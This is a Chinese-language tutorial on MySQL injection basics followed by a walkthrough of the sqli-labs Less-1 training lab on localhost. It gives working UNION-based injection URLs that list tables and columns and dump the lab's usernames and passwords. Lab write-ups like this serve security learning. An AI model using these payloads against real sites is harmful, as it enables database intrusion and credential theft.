先来了解一下MYSQL注入的基本姿势
url编码:
- url中只能含有英文字母、阿拉伯数字和某些标点符号,不能使用其他文字和符号,所以要对其编码
- sql注入中常用的url编码有:空格%20,单引号%27,双引号%22,井号%23
mysql中常用的系统表与函数:
- 系统数据库information_schema存储数据库元数据,其中的tables存储了表的元数据,常用字段:table_schema(数据库名),table_name(表名);columns存储了列的元数据。常用字段:column_name(列名),table_name(表名)
-
字符连接函数concat
-
select concat(1,2,3,4,5); +-------------------+ | concat(1,2,3,4,5) | +-------------------+ | 12345 | +-------------------+
-
concat_ws(第一个参数为分隔符)
-
select concat_ws(':',1,2,3,4,5); +--------------------------+ | concat_ws(':',1,2,3,4,5) | +--------------------------+ | 1:2:3:4:5 | +--------------------------+
-
group_concat(将多行查询结果连接称一行)
-
select group_concat(table_name) from tables where table_schema="security"; +-------------------------------+ | group_concat(table_name) | +-------------------------------+ | emails,referers,uagents,users | +-------------------------------+
-
char函数将ascii码转化成字符
-
select char(0x23,0x27,41,42,126); +---------------------------+ | char(0x23,0x27,41,42,126) | +---------------------------+ | #')*~ | +---------------------------+
-
user函数显示当前用户,database函数显示使用数据库,version函数显示数据库名称和版本
-
select CONCAT_WS(CHAR(32,58,32),user(),database(),version()); +-------------------------------------------------------+ | CONCAT_WS(CHAR(32,58,32),user(),database(),version()) | +-------------------------------------------------------+ | root@localhost : information_schema : 10.1.32-MariaDB | +-------------------------------------------------------+
LESS 1 基于字符串的注入
提示以数字id作为参数输入
先让id=’看看会不会报错:
报错了,错误信息:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’’’ LIMIT 0,1’ at line 1
可以看出参数为字符串,于是构造union语句查出列数为3:
http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,2,3%23
令id=0是因为经查询发现表中没有id=0的段,所以查询结果就会变成union语句中的查询结果,’和注释符%23用来绕过查询语句中的单引号,结果:
Welcome Dhakkan
Your Login name:2
Your Password:3
于是构造查询语句:
http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23
获得了当前数据库的表名:
Welcome Dhakkan
Your Login name:emails,referers,uagents,users
Your Password:3
继续查询users表的列名:
http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’%23
结果:
Welcome Dhakkan
Your Login name:USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password
Your Password:3
最后的payload:
http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(username),group_concat(password) from users%23
结果:
Welcome Dhakkan
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4